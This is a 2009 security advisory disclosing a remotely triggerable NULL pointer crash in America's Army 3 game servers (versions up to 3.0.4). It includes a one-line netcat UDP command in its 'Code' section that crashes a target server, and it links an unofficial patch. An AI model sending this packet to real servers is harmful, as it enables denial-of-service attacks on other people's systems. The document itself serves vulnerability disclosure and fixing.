America's Army 3 versions 3.0.4 and below suffer from a null pointer vulnerability.
3acfb90412f07f7f8f0f99747a102e8c481be969db2fe902334f360e2dba9822
#######################################################################
Luigi Auriemma
Application: America's Army 3
http://www.americasarmy.com/aa3.php
Versions: <= 3.0.4
Platforms: Windows
Bug: NULL pointer
Exploitation: remote, versus server
Date: 06 Jul 2009
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
America's Army 3 (AA3) is the new free game of the AA series developed
for the U.S. Army as an help with the military recruitments.
Released about 20 days ago it's already played by thousands of players
and with more than 400 online servers
(http://login.aa3.americasarmy.com/servers).
#######################################################################
======
2) Bug
======
Differently than the older version AA3 has introduced a new proprietary
type of query used for retrieving informations from the servers.
The reply received from the servers is compressed and contains many
informations (included the IP addresses of the clients... mah).
The job of parsing such query is performed by the acpu_decompile
function in libaa3.dll which returns a pointer to a new allocated
structure which is then used internally by the game.
Using an invalid type of query (for example one which doesn't start
with the 0x6fe1 value) is possible to force this function to fail with
the result of returing a NULL pointer instead of the pointer to the new
data and with the consequence of the crash of the entire server due to
the lack of checks.
Only one single UDP packet is needed to exploit the vulnerability so
without limitations and with the possibility for the attacker of
spoofing the own IP address.
#######################################################################
===========
3) The Code
===========
echo blah | nc SERVER 39300 -v -v -u
note: instead the LAN servers use port 9002
#######################################################################
======
4) Fix
======
No fix.
I have released an unofficial fix for the latest known server's version
available in the moment I'm writing:
http://aluigi.org/patches/aa3blahfix.lpatch
#######################################################################